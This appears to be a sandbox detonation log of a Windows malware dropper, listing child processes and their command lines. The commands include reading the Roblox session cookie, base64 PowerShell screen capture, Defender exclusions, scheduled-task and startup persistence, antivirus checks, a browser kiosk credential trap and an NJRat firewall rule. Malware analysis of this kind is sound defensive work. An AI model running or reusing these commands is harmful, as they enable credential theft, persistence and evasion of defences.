ACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
        6⤵
        
        PID:5424
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\nrio0v12\nrio0v12.cmdline"
        7⤵
        
        PID:6060
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6414.tmp" "c:\Users\Admin\AppData\Local\Temp\nrio0v12\CSCC02CD848533146D48262D137E258D955.TMP"
        8⤵
        
        PID:5136
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        5⤵
        
        PID:5500
      - C:\Windows\system32\tree.com
        
        tree /A /F
        6⤵
        
        PID:5672
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
        5⤵
        
        PID:5624
      - C:\Windows\system32\attrib.exe
        
        attrib -r C:\Windows\System32\drivers\etc\hosts
        6⤵
        Drops file in Drivers directory
        Views/modifies file attributes
        
        PID:5728
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        5⤵
        
        PID:5716
      - C:\Windows\system32\tree.com
        
        tree /A /F
        6⤵
        
        PID:5836
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
        5⤵
        
        PID:5788
      - C:\Windows\system32\attrib.exe
        
        attrib +r C:\Windows\System32\drivers\etc\hosts
        6⤵
        Drops file in Drivers directory
        Views/modifies file attributes
        
        PID:5908
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        5⤵
        
        PID:5872
      - C:\Windows\system32\tree.com
        
        tree /A /F
        6⤵
        
        PID:5980
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        5⤵
        
        PID:5936
      - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        6⤵
        Enumerates processes with tasklist
        
        PID:6052
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        5⤵
        
        PID:6000
      - C:\Windows\system32\tree.com
        
        tree /A /F
        6⤵
        
        PID:6104
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        5⤵
        
        PID:6132
      - C:\Windows\system32\tree.com
        
        tree /A /F
        6⤵
        
        PID:4000
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
        5⤵
        
        PID:3396
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:5308
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3532
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
        5⤵
        
        PID:5740
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        6⤵
        
        PID:5656
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "getmac"
        5⤵
        
        PID:1992
      - C:\Windows\system32\getmac.exe
        
        getmac
        6⤵
        
        PID:5828
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI50082\rar.exe a -r -hp"Logger1@12345" "C:\Users\Admin\AppData\Local\Temp\Di5Nk.zip" *"
        5⤵
        
        PID:5820
      - C:\Users\Admin\AppData\Local\Temp\_MEI50082\rar.exe
        
        C:\Users\Admin\AppData\Local\Temp\_MEI50082\rar.exe a -r -hp"Logger1@12345" "C:\Users\Admin\AppData\Local\Temp\Di5Nk.zip" *
        6⤵
        Executes dropped EXE
        
        PID:5796
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic os get Caption"
        5⤵
        
        PID:6048
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic os get Caption
        6⤵
        
        PID:6072
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
        5⤵
        
        PID:2804
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic computersystem get totalphysicalmemory
        6⤵
        
        PID:3928
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        5⤵
        
        PID:2240
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        6⤵
        
        PID:1912
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
        5⤵
        
        PID:5152
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4616
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
        5⤵
        
        PID:2328
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        6⤵
        Detects videocard installed
        
        PID:5424
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
        5⤵
        
        PID:5268
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
        6⤵
        
        PID:3428
- - C:\Users\Admin\AppData\Local\Temp\Files\krgawdtyjawd.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\krgawdtyjawd.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Checks processor information in registry
    PID:2372
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2372 -s 1296
      4⤵
      Program crash
      PID:3968
- - C:\Users\Admin\AppData\Local\Temp\Files\NBYS%20AH.NET.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\NBYS%20AH.NET.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:5812
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5812 -s 1112
      4⤵
      Program crash
      PID:1076
- - C:\Users\Admin\AppData\Local\Temp\Files\lega.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\lega.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    PID:2604
  - - C:\Users\Admin\AppData\Local\Temp\Files\lega.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\lega.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:1692
- - C:\Users\Admin\AppData\Local\Temp\Files\Update.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\Update.exe"
    3⤵
    - Executes dropped EXE
    PID:5804
- - C:\Users\Admin\AppData\Local\Temp\Files\mthimskef.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\mthimskef.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:5600
- - C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe"
    3⤵
    PID:5280
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:5500
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:816
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\svchost.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:6084
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:5080
  - - C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\svchost.exe"
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:2732
- - C:\Users\Admin\AppData\Local\Temp\Files\gjawedrtg.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\gjawedrtg.exe"
    3⤵
    PID:4516
- - C:\Users\Admin\AppData\Local\Temp\Files\PO076567890000.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\PO076567890000.exe"
    3⤵
    PID:3856
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
      "Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\Admin\AppData\Local\Temp\Files\PO076567890000.exe' 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:3148
  - - C:\Users\Admin\AppData\Local\Temp\Files\PO076567890000.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\PO076567890000.exe"
      4⤵
      PID:4384
- - C:\Users\Admin\AppData\Local\Temp\Files\343dsxs.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\343dsxs.exe"
    3⤵
    PID:6012
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      4⤵
      PID:1652
- - C:\Users\Admin\AppData\Local\Temp\Files\InfluencedNervous.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\InfluencedNervous.exe"
    3⤵
    PID:5716
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /k copy Fail Fail.cmd & Fail.cmd & exit
      4⤵
      PID:6116
    - - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        5⤵
        Enumerates processes with tasklist
        
        PID:5876
    - - C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "wrsa.exe opssvc.exe"
        5⤵
        
        PID:1096
    - - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        5⤵
        Enumerates processes with tasklist
        
        PID:4964
    - - C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "avastui.exe avgui.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe"
        5⤵
        
        PID:432
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c md 229536
        5⤵
        
        PID:5436
    - - C:\Windows\SysWOW64\findstr.exe
        
        findstr /V "ReprintVerificationMercyRepository" Elliott
        5⤵
        
        PID:3220
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b Exhibit + Rand + Hours 229536\U
        5⤵
        
        PID:1600
    - - C:\Users\Admin\AppData\Local\Temp\229536\Webster.pif
        
        229536\Webster.pif 229536\U
        5⤵
        
        PID:5968
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 5
        5⤵
        Delays execution with timeout.exe
        
        PID:544
- - C:\Users\Admin\AppData\Local\Temp\Files\random.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\random.exe"
    3⤵
    PID:5736
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM firefox.exe /T
      4⤵
      Kills process with taskkill
      PID:5904
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM chrome.exe /T
      4⤵
      Kills process with taskkill
      PID:2372
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM msedge.exe /T
      4⤵
      Kills process with taskkill
      PID:2388
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM opera.exe /T
      4⤵
      Kills process with taskkill
      PID:5928
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM brave.exe /T
      4⤵
      Kills process with taskkill
      PID:2188
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
      4⤵
      PID:5276
    - - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
        5⤵
        
        PID:376
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1976 -parentBuildID 20240401114208 -prefsHandle 1876 -prefMapHandle 1868 -prefsLen 23680 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {5c17947e-c4c1-4609-a50c-d2f96c59e530} 376 "\\.\pipe\gecko-crash-server-pipe.376" gpu
        6⤵
        
        PID:5836
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2432 -parentBuildID 20240401114208 -prefsHandle 2424 -prefMapHandle 2420 -prefsLen 24600 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {1d25484f-a191-4e40-ab6c-b901121c4331} 376 "\\.\pipe\gecko-crash-server-pipe.376" socket
        6⤵
        
        PID:4540
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3056 -childID 1 -isForBrowser -prefsHandle 3048 -prefMapHandle 3044 -prefsLen 22652 -prefMapSize 244658 -jsInitHandle 1140 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {410e9736-32b2-4df6-905a-b48daa2ee457} 376 "\\.\pipe\gecko-crash-server-pipe.376" tab
        6⤵
        
        PID:1292
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3784 -childID 2 -isForBrowser -prefsHandle 1264 -prefMapHandle 3036 -prefsLen 29090 -prefMapSize 244658 -jsInitHandle 1140 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {eb4516d2-ac5b-47c6-b014-af3a04a307a5} 376 "\\.\pipe\gecko-crash-server-pipe.376" tab
        6⤵
        
        PID:6000
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4164 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4184 -prefMapHandle 4180 -prefsLen 29090 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {afc01477-9dcc-4050-a724-eafc0b9472a2} 376 "\\.\pipe\gecko-crash-server-pipe.376" utility
        6⤵
        
        PID:5808
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4948 -childID 3 -isForBrowser -prefsHandle 5324 -prefMapHandle 5320 -prefsLen 26944 -prefMapSize 244658 -jsInitHandle 1140 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {dbb1fd6b-acf2-4b1a-b330-419483d75032} 376 "\\.\pipe\gecko-crash-server-pipe.376" tab
        6⤵
        
        PID:5448
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5624 -childID 4 -isForBrowser -prefsHandle 5492 -prefMapHandle 5496 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 1140 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {938bfd5e-4af8-48ac-af8f-919101f32796} 376 "\\.\pipe\gecko-crash-server-pipe.376" tab
        6⤵
        
        PID:4268
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5764 -childID 5 -isForBrowser -prefsHandle 5472 -prefMapHandle 5476 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 1140 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b081c9af-1ffc-4b91-8e4b-10bab4c59158} 376 "\\.\pipe\gecko-crash-server-pipe.376" tab
        6⤵
        
        PID:2856
- - C:\Users\Admin\AppData\Local\Temp\Files\KB824105-x86-ENU.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\KB824105-x86-ENU.exe"
    3⤵
    PID:4784
  - - C:\Windows\SysWOW64\cmd.exe
      "cmd" /c net use
      4⤵
      PID:5588
    - - C:\Windows\SysWOW64\net.exe
        
        net use
        5⤵
        
        PID:2896
- - C:\Users\Admin\AppData\Local\Temp\Files\needmoney.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\needmoney.exe"
    3⤵
    PID:6032
  - - C:\Users\Admin\AppData\Local\Temp\svchost015.exe
      C:\Users\Admin\AppData\Local\Temp\svchost015.exe
      4⤵
      PID:1096
- - C:\Users\Admin\AppData\Local\Temp\Files\setup8.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\setup8.exe"
    3⤵
    PID:1100
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c
      4⤵
      PID:5560
- - C:\Users\Admin\AppData\Local\Temp\Files\networkmanager.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\networkmanager.exe"
    3⤵
    PID:1612
- - C:\Users\Admin\AppData\Local\Temp\Files\gawdth.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\gawdth.exe"
    3⤵
    PID:5536
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\1.bat" "
      4⤵
      PID:3988
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\clamer.exe
        
        clamer.exe -priverdD
        5⤵
        
        PID:3200
      - C:\Users\Admin\AppData\Local\Temp\RarSFX1\lofsawd.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX1\lofsawd.exe"
        6⤵
        
        PID:2540
- - C:\Users\Admin\AppData\Local\Temp\Files\jet.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\jet.exe"
    3⤵
    PID:2064
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.funletters.net/readme.htm
      4⤵
      PID:5296
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb41b346f8,0x7ffb41b34708,0x7ffb41b34718
        5⤵
        
        PID:5356
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2132,8270452449672653457,17579096226911387121,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2144 /prefetch:2
        5⤵
        
        PID:2180
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2132,8270452449672653457,17579096226911387121,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2196 /prefetch:3
        5⤵
        
        PID:3268
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2132,8270452449672653457,17579096226911387121,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2820 /prefetch:8
        5⤵
        
        PID:1512
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,8270452449672653457,17579096226911387121,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3228 /prefetch:1
        5⤵
        
        PID:2712
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,8270452449672653457,17579096226911387121,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3264 /prefetch:1
        5⤵
        
        PID:4896
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,8270452449672653457,17579096226911387121,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4868 /prefetch:1
        5⤵
        
        PID:6728
    - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2132,8270452449672653457,17579096226911387121,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5728 /prefetch:8
        5⤵
        
        PID:6148
- - C:\Users\Admin\AppData\Local\Temp\Files\NJRat.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\NJRat.exe"
    3⤵
    PID:5856
  - - C:\Windows\SysWOW64\netsh.exe
      netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\Files\NJRat.exe" "NJRat.exe" ENABLE
      4⤵
      Modifies Windows Firewall
      PID:6368
- - C:\Users\Admin\AppData\Local\Temp\Files\j4vzzuai.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\j4vzzuai.exe"
    3⤵
    PID:7056
  - - C:\Users\Admin\AppData\Local\Temp\Files\j4vzzuai.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\j4vzzuai.exe"
      4⤵
      PID:6744
